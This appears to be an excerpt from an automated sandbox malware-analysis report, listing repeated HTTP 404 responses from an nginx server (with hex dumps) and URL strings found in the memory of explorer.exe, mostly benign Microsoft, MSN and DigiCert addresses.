Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:14:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:14:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:14:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:14:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:14:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:14:10 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:14:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:14:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:14:16 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:15:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:15:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:15:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:16:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: explorer.exe, 00000001.00000000.1729546145.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1731194544.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000001.00000000.1729546145.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1731194544.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000001.00000000.1729546145.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1731194544.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000001.00000000.1729546145.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1731194544.000000000982D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000001.00000000.1729546145.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000001.00000000.1731700485.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000001.00000000.1731700485.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000001.00000000.1730664366.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1731843404.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1730287769.0000000007F40000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000001.00000000.1733753892.000000000C964000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000001.00000000.1733753892.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000001.00000000.1729546145.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000001.00000000.1729546145.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000001.00000000.1733753892.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000001.00000000.1731194544.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000001.00000000.1731194544.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 00000001.00000000.1728453550.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1720994165.0000000001240000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000001.00000000.1731194544.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000001.00000000.1731194544.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000001.00000000.1731194544.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1729546145.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1729546145.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000001.00000000.1733753892.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
